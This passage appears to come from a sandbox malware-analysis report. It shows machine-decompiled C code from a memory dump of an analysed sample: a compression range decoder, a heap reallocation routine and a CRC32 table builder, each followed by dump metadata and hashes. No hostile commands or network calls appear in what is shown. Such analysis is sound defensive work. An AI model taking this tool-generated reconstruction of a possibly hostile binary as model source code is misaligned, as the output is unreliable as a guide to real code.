                                          												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
                                          												goto L64;
                                          											} else {
                                          												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
                                          													return 3;
                                          												} else {
                                          													goto L2;
                                          												}
                                          											}
                                          										} else {
                                          											if(_t179 >=  *(_t351 + 0x10)) {
                                          												goto L2;
                                          											} else {
                                          												_t287 = _t228 << 8;
                                          												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
                                          												_t179 =  &(_t179[1]);
                                          												 *(_t351 + 0x28) = _t179;
                                          												goto L48;
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									if(_t225 >=  *(_t351 + 0x10)) {
                                          										goto L2;
                                          									} else {
                                          										_t285 = _t285 << 8;
                                          										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
                                          										 *(_t351 + 0x28) =  &(_t225[1]);
                                          										goto L44;
                                          									}
                                          								}
                                          							} else {
                                          								_t288 = _t157;
                                          								 *(_t351 + 0x20) = 0;
                                          								_t296 = _t293 + 0x664;
                                          								 *(_t351 + 0x1c) = 2;
                                          								L64:
                                          								_t161 =  *_t296 & 0x0000ffff;
                                          								if(_t288 >= 0x1000000) {
                                          									L67:
                                          									_t238 = (_t288 >> 0xb) * _t161;
                                          									_t162 =  *(_t351 + 0x28);
                                          									if(_t323 >= _t238) {
                                          										_t341 = _t296[1] & 0x0000ffff;
                                          										_t289 = _t288 - _t238;
                                          										_t325 = _t323 - _t238;
                                          										if(_t289 >= 0x1000000) {
                                          											L72:
                                          											_t241 = (_t289 >> 0xb) * _t341;
                                          											if(_t325 >= _t241) {
                                          												_t290 = _t289 - _t241;
                                          												_t325 = _t325 - _t241;
                                          												_t205 =  &(_t296[0x102]);
                                          												_t342 = 0x10;
                                          												 *(_t351 + 0x18) = 0x100;
                                          											} else {
                                          												_t342 = 8;
                                          												_t290 = _t241;
                                          												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
                                          												 *(_t351 + 0x18) = 8;
                                          											}
                                          											goto L75;
                                          										} else {
                                          											if(_t162 >=  *(_t351 + 0x10)) {
                                          												goto L2;
                                          											} else {
                                          												_t289 = _t289 << 8;
                                          												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
                                          												_t162 =  &(_t162[1]);
                                          												 *(_t351 + 0x28) = _t162;
                                          												goto L72;
                                          											}
                                          										}
                                          									} else {
                                          										_t290 = _t238;
                                          										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
                                          										_t342 = 0;
                                          										 *(_t351 + 0x18) = 8;
                                          										L75:
                                          										_t297 = 1;
                                          										L76:
                                          										while(1) {
                                          											if(_t290 >= 0x1000000) {
                                          												L79:
                                          												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
                                          												if(_t325 >= _t244) {
                                          													_t290 = _t290 - _t244;
                                          													_t325 = _t325 - _t244;
                                          													_t297 = _t297 + _t297 + 1;
                                          												} else {
                                          													_t290 = _t244;
                                          													_t297 = _t297 + _t297;
                                          												}
                                          												_t164 =  *(_t351 + 0x18);
                                          												if(_t297 >= _t164) {
                                          													_t298 = _t297 + _t342 - _t164;
                                          													if( *(_t351 + 0x20) >= 4) {
                                          														goto L20;
                                          													} else {
                                          														if(_t298 >= 4) {
                                          															_t298 = 3;
                                          														}
                                          														_t167 =  *((intOrPtr*)(_t351 + 0x14));
                                          														_t344 =  *(_t351 + 0x28);
                                          														_t128 = _t167 + 0x360; // 0x363
                                          														_t206 = (_t298 << 7) + _t128;
                                          														_t300 = 1;
                                          														do {
                                          															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
                                          															if(_t290 >= 0x1000000) {
                                          																goto L91;
                                          															} else {
                                          																if(_t344 >=  *(_t351 + 0x10)) {
                                          																	goto L2;
                                          																} else {
                                          																	_t290 = _t290 << 8;
                                          																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
                                          																	_t344 =  &(_t344[1]);
                                          																	goto L91;
                                          																}
                                          															}
                                          															goto L113;
                                          															L91:
                                          															_t247 = (_t290 >> 0xb) * _t168;
                                          															if(_t325 >= _t247) {
                                          																_t290 = _t290 - _t247;
                                          																_t325 = _t325 - _t247;
                                          																_t300 = _t300 + _t300 + 1;
                                          															} else {
                                          																_t290 = _t247;
                                          																_t300 = _t300 + _t300;
                                          															}
                                          														} while (_t300 < 0x40);
                                          														_t301 = _t300 - 0x40;
                                          														if(_t301 < 4) {
                                          															goto L21;
                                          														} else {
                                          															_t251 = (_t301 >> 1) - 1;
                                          															if(_t301 >= 0xe) {
                                          																_t169 =  *(_t351 + 0x10);
                                          																_t252 = _t251 - 4;
                                          																do {
                                          																	if(_t290 >= 0x1000000) {
                                          																		goto L102;
                                          																	} else {
                                          																		if(_t344 >= _t169) {
                                          																			goto L2;
                                          																		} else {
                                          																			_t290 = _t290 << 8;
                                          																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
                                          																			_t344 =  &(_t344[1]);
                                          																			goto L102;
                                          																		}
                                          																	}
                                          																	goto L113;
                                          																	L102:
                                          																	_t290 = _t290 >> 1;
                                          																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
                                          																	_t252 = _t252 - 1;
                                          																} while (_t252 != 0);
                                          																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
                                          																_t251 = 4;
                                          																goto L104;
                                          															} else {
                                          																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
                                          																L104:
                                          																_t207 = 1;
                                          																do {
                                          																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
                                          																	if(_t290 >= 0x1000000) {
                                          																		goto L108;
                                          																	} else {
                                          																		if(_t344 >=  *(_t351 + 0x10)) {
                                          																			goto L2;
                                          																		} else {
                                          																			_t290 = _t290 << 8;
                                          																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
                                          																			_t344 =  &(_t344[1]);
                                          																			goto L108;
                                          																		}
                                          																	}
                                          																	goto L113;
                                          																	L108:
                                          																	_t310 = (_t290 >> 0xb) * _t171;
                                          																	if(_t325 >= _t310) {
                                          																		_t290 = _t290 - _t310;
                                          																		_t325 = _t325 - _t310;
                                          																		_t207 = _t207 + _t207 + 1;
                                          																	} else {
                                          																		_t290 = _t310;
                                          																		_t207 = _t207 + _t207;
                                          																	}
                                          																	_t251 = _t251 - 1;
                                          																} while (_t251 != 0);
                                          																goto L21;
                                          															}
                                          														}
                                          													}
                                          												} else {
                                          													_t162 =  *(_t351 + 0x28);
                                          													continue;
                                          												}
                                          											} else {
                                          												if(_t162 >=  *(_t351 + 0x10)) {
                                          													goto L2;
                                          												} else {
                                          													_t290 = _t290 << 8;
                                          													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
                                          													 *(_t351 + 0x28) =  &(_t162[1]);
                                          													goto L79;
                                          												}
                                          											}
                                          											goto L113;
                                          										}
                                          									}
                                          								} else {
                                          									if(_t225 >=  *(_t351 + 0x10)) {
                                          										goto L2;
                                          									} else {
                                          										_t288 = _t288 << 8;
                                          										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
                                          										 *(_t351 + 0x28) =  &(_t225[1]);
                                          										goto L67;
                                          									}
                                          								}
                                          							}
                                          						} else {
                                          							if(_t225 >=  *(_t351 + 0x10)) {
                                          								goto L2;
                                          							} else {
                                          								_t284 = _t284 << 8;
                                          								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
                                          								_t225 =  &(_t225[1]);
                                          								 *(_t351 + 0x28) = _t225;
                                          								goto L39;
                                          							}
                                          						}
                                          					} else {
                                          						_t291 = _t153;
                                          						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
                                          						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
                                          							_t265 = _t292[9];
                                          							if(_t265 == 0) {
                                          								_t265 = _t292[0xa];
                                          							}
                                          							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
                                          						}
                                          						if(_t340 >= 7) {
                                          							_t270 = _t292[9];
                                          							_t215 = _t292[0xe];
                                          							if(_t270 >= _t215) {
                                          								_t190 = 0;
                                          							} else {
                                          								_t190 = _t292[0xa];
                                          							}
                                          							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
                                          							_t216 = 0x100;
                                          							_t319 = 1;
                                          							while(1) {
                                          								_t272 = _t271 + _t271;
                                          								_t192 = _t216 & _t272;
                                          								 *(_t351 + 0x20) = _t272;
                                          								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
                                          								if(_t291 >= 0x1000000) {
                                          									goto L31;
                                          								}
                                          								_t279 =  *(_t351 + 0x28);
                                          								if(_t279 >=  *(_t351 + 0x10)) {
                                          									goto L2;
                                          								} else {
                                          									_t291 = _t291 << 8;
                                          									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
                                          									 *(_t351 + 0x28) =  &(_t279[1]);
                                          									goto L31;
                                          								}
                                          								goto L113;
                                          								L31:
                                          								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
                                          								if(_t321 >= _t278) {
                                          									_t290 = _t291 - _t278;
                                          									_t321 = _t321 - _t278;
                                          									_t319 = _t319 + _t319 + 1;
                                          								} else {
                                          									_t290 = _t278;
                                          									_t319 = _t319 + _t319;
                                          									_t192 =  !_t192;
                                          								}
                                          								_t216 = _t216 & _t192;
                                          								if(_t319 >= 0x100) {
                                          									goto L19;
                                          								} else {
                                          									_t271 =  *(_t351 + 0x20);
                                          									continue;
                                          								}
                                          								goto L113;
                                          							}
                                          						} else {
                                          							_t281 = 1;
                                          							do {
                                          								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
                                          								if(_t291 >= 0x1000000) {
                                          									goto L15;
                                          								} else {
                                          									_t197 =  *(_t351 + 0x28);
                                          									if(_t197 >=  *(_t351 + 0x10)) {
                                          										goto L2;
                                          									} else {
                                          										_t291 = _t291 << 8;
                                          										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
                                          										 *(_t351 + 0x28) =  &(_t197[1]);
                                          										goto L15;
                                          									}
                                          								}
                                          								goto L113;
                                          								L15:
                                          								_t196 = (_t291 >> 0xb) * _t320;
                                          								if(_t321 >= _t196) {
                                          									_t291 = _t291 - _t196;
                                          									_t321 = _t321 - _t196;
                                          									_t281 = _t281 + _t281 + 1;
                                          								} else {
                                          									_t291 = _t196;
                                          									_t281 = _t281 + _t281;
                                          								}
                                          							} while (_t281 < 0x100);
                                          							L19:
                                          							 *(_t351 + 0x1c) = 1;
                                          							L20:
                                          							_t344 =  *(_t351 + 0x28);
                                          							L21:
                                          							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
                                          								return  *(_t351 + 0x1c);
                                          							} else {
                                          								goto L2;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					_t199 =  *(_t351 + 0x28);
                                          					if(_t199 <  *(_t351 + 0x10)) {
                                          						_t283 = _t283 << 8;
                                          						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
                                          						 *(_t351 + 0x28) =  &(_t199[1]);
                                          						goto L4;
                                          					} else {
                                          						L2:
                                          						return 0;
                                          					}
                                          				}
                                          				L113:
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp

                                          C-Code - Quality: 100%
                                          			E004162A6(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
                                          				signed int _v8;
                                          				signed char _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _t186;
                                          				void* _t187;
                                          				signed int _t188;
                                          				signed int* _t189;
                                          				intOrPtr _t191;
                                          				signed int* _t192;
                                          				signed int* _t193;
                                          				signed char _t194;
                                          				intOrPtr _t195;
                                          				intOrPtr* _t196;
                                          				signed int _t199;
                                          				signed int _t202;
                                          				signed int _t207;
                                          				signed int _t209;
                                          				signed int _t218;
                                          				signed int _t221;
                                          				signed int* _t222;
                                          				signed int _t227;
                                          				intOrPtr _t228;
                                          				intOrPtr _t229;
                                          				intOrPtr _t230;
                                          				char _t233;
                                          				signed int _t234;
                                          				signed char _t235;
                                          				signed int* _t237;
                                          				signed int* _t239;
                                          				signed int* _t244;
                                          				signed int* _t245;
                                          				signed char _t250;
                                          				intOrPtr _t256;
                                          				signed int _t257;
                                          				char _t258;
                                          				char _t259;
                                          				signed char _t260;
                                          				signed int* _t262;
                                          				signed int* _t267;
                                          				signed int* _t268;
                                          				char* _t270;
                                          				signed int _t274;
                                          				unsigned int _t275;
                                          				intOrPtr _t277;
                                          				unsigned int _t278;
                                          				intOrPtr* _t280;
                                          				void* _t281;
                                          				signed char _t290;
                                          				signed int _t292;
                                          				signed char _t295;
                                          				signed int _t298;
                                          				signed int _t302;
                                          				signed int* _t304;
                                          
                                          				_t222 = _a4;
                                          				_t280 = _a8;
                                          				_t186 =  *((intOrPtr*)(_t222 + 0x10));
                                          				_t292 = _a12 + 0x00000017 & 0xfffffff0;
                                          				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
                                          				_v16 = _t274 * 0x204 + _t186 + 0x144;
                                          				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
                                          				_a12 = _t227;
                                          				_t194 =  *(_t227 + _t280 - 4);
                                          				_t281 = _t227 + _t280 - 4;
                                          				_v8 = _t194;
                                          				if(_t292 <= _t227) {
                                          					if(__eflags < 0) {
                                          						_t195 = _a8;
                                          						_a12 = _a12 - _t292;
                                          						_t228 = _t292 + 1;
                                          						 *((intOrPtr*)(_t195 - 4)) = _t228;
                                          						_t196 = _t195 + _t292 - 4;
                                          						_a8 = _t196;
                                          						_t295 = (_a12 >> 4) - 1;
                                          						 *((intOrPtr*)(_t196 - 4)) = _t228;
                                          						__eflags = _t295 - 0x3f;
                                          						if(_t295 > 0x3f) {
                                          							_t295 = 0x3f;
                                          						}
                                          						__eflags = _v8 & 0x00000001;
                                          						if((_v8 & 0x00000001) == 0) {
                                          							_t298 = (_v8 >> 4) - 1;
                                          							__eflags = _t298 - 0x3f;
                                          							if(_t298 > 0x3f) {
                                          								_t298 = 0x3f;
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
                                          							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                                          								__eflags = _t298 - 0x20;
                                          								if(_t298 >= 0x20) {
                                          									_t128 = _t298 - 0x20; // -32
                                          									_t130 = _t186 + 4; // 0x4
                                          									_t244 = _t298 + _t130;
                                          									_t199 =  !(0x80000000 >> _t128);
                                          									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                                          									 *_t244 =  *_t244 - 1;
                                          									__eflags =  *_t244;
                                          									if( *_t244 == 0) {
                                          										_t245 = _a4;
                                          										_t138 = _t245 + 4;
                                          										 *_t138 =  *(_t245 + 4) & _t199;
                                          										__eflags =  *_t138;
                                          									}
                                          								} else {
                                          									_t304 = _t298 + _t186 + 4;
                                          									_t202 =  !(0x80000000 >> _t298);
                                          									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                                          									 *_t304 =  *_t304 - 1;
                                          									__eflags =  *_t304;
                                          									if( *_t304 == 0) {
                                          										 *_a4 =  *_a4 & _t202;
                                          									}
                                          								}
                                          								_t196 = _a8;
                                          							}
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                                          							_t302 = _a12 + _v8;
                                          							_a12 = _t302;
                                          							_t295 = (_t302 >> 4) - 1;
                                          							__eflags = _t295 - 0x3f;
                                          							if(_t295 > 0x3f) {
                                          								_t295 = 0x3f;
                                          							}
                                          						}
                                          						_t229 = _v16;
                                          						_t230 = _t229 + _t295 * 8;
                                          						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
                                          						 *((intOrPtr*)(_t196 + 8)) = _t230;
                                          						 *((intOrPtr*)(_t230 + 4)) = _t196;
                                          						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
                                          						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
                                          						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
                                          							_t233 =  *(_t295 + _t186 + 4);
                                          							__eflags = _t295 - 0x20;
                                          							_a11 = _t233;
                                          							_t234 = _t233 + 1;
                                          							__eflags = _t234;
                                          							 *(_t295 + _t186 + 4) = _t234;
                                          							if(_t234 >= 0) {
                                          								__eflags = _a11;
                                          								if(_a11 == 0) {
                                          									_t237 = _a4;
                                          									_t176 = _t237 + 4;
                                          									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
                                          									__eflags =  *_t176;
                                          								}
                                          								_t189 = _t186 + 0xc4 + _t274 * 4;
                                          								_t235 = _t295 - 0x20;
                                          								_t275 = 0x80000000;
                                          							} else {
                                          								__eflags = _a11;
                                          								if(_a11 == 0) {
                                          									_t239 = _a4;
                                          									 *_t239 =  *_t239 | 0x80000000 >> _t295;
                                          									__eflags =  *_t239;
                                          								}
                                          								_t189 = _t186 + 0x44 + _t274 * 4;
                                          								_t275 = 0x80000000;
                                          								_t235 = _t295;
                                          							}
                                          							 *_t189 =  *_t189 | _t275 >> _t235;
                                          							__eflags =  *_t189;
                                          						}
                                          						_t188 = _a12;
                                          						 *_t196 = _t188;
                                          						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
                                          					}
                                          					L52:
                                          					_t187 = 1;
                                          					return _t187;
                                          				}
                                          				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
                                          					return 0;
                                          				} else {
                                          					_t250 = (_v8 >> 4) - 1;
                                          					_v12 = _t250;
                                          					if(_t250 > 0x3f) {
                                          						_t250 = 0x3f;
                                          						_v12 = _t250;
                                          					}
                                          					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                                          						if(_t250 >= 0x20) {
                                          							_t267 = _v12 + _t186 + 4;
                                          							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
                                          							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                                          							 *_t267 =  *_t267 - 1;
                                          							__eflags =  *_t267;
                                          							if( *_t267 == 0) {
                                          								_t268 = _a4;
                                          								_t44 = _t268 + 4;
                                          								 *_t44 =  *(_t268 + 4) & _t218;
                                          								__eflags =  *_t44;
                                          							}
                                          						} else {
                                          							_t270 = _v12 + _t186 + 4;
                                          							_t221 =  !(0x80000000 >> _t250);
                                          							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                                          							 *_t270 =  *_t270 - 1;
                                          							if( *_t270 == 0) {
                                          								 *_a4 =  *_a4 & _t221;
                                          							}
                                          						}
                                          					}
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                                          					_v8 = _v8 + _a12 - _t292;
                                          					if(_v8 <= 0) {
                                          						_t277 = _a8;
                                          					} else {
                                          						_t290 = (_v8 >> 4) - 1;
                                          						_t256 = _a8 + _t292 - 4;
                                          						if(_t290 > 0x3f) {
                                          							_t290 = 0x3f;
                                          						}
                                          						_t207 = _v16 + _t290 * 8;
                                          						_a12 = _t207;
                                          						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
                                          						_t209 = _a12;
                                          						 *(_t256 + 8) = _t209;
                                          						 *((intOrPtr*)(_t209 + 4)) = _t256;
                                          						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
                                          						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
                                          							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
                                          							_a15 = _t258;
                                          							_t259 = _t258 + 1;
                                          							 *((char*)(_t290 + _t186 + 4)) = _t259;
                                          							if(_t259 >= 0) {
                                          								__eflags = _a15;
                                          								if(_a15 == 0) {
                                          									_t84 = _t290 - 0x20; // -33
                                          									_t262 = _a4;
                                          									_t86 = _t262 + 4;
                                          									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
                                          									__eflags =  *_t86;
                                          								}
                                          								_t193 = _t186 + 0xc4 + _t274 * 4;
                                          								_t91 = _t290 - 0x20; // -33
                                          								_t260 = _t91;
                                          								_t278 = 0x80000000;
                                          							} else {
                                          								if(_a15 == 0) {
                                          									 *_a4 =  *_a4 | 0x80000000 >> _t290;
                                          								}
                                          								_t193 = _t186 + 0x44 + _t274 * 4;
                                          								_t278 = 0x80000000;
                                          								_t260 = _t290;
                                          							}
                                          							 *_t193 =  *_t193 | _t278 >> _t260;
                                          						}
                                          						_t277 = _a8;
                                          						_t257 = _v8;
                                          						_t192 = _t277 + _t292 - 4;
                                          						 *_t192 = _t257;
                                          						 *(_t257 + _t192 - 4) = _t257;
                                          					}
                                          					_t191 = _t292 + 1;
                                          					 *((intOrPtr*)(_t277 - 4)) = _t191;
                                          					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
                                          					goto L52;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                          • Instruction ID: ff32ffadf5a964956f90e5d4d875ac86f6d3b74cc38b5144254d495ff0ae7514
                                          • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                          • Instruction Fuzzy Hash: D3B18E75A0020ADFDB15CF04C5D0AE9BBA2BF58318F25C19EC85A4B346C735EE82CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403A01() {
                                          				void* _t37;
                                          				signed int _t38;
                                          				signed int _t72;
                                          
                                          				_t72 = 0;
                                          				do {
                                          					 *(0x4236c0 + _t72 * 4) =  !((( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) 
- 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( 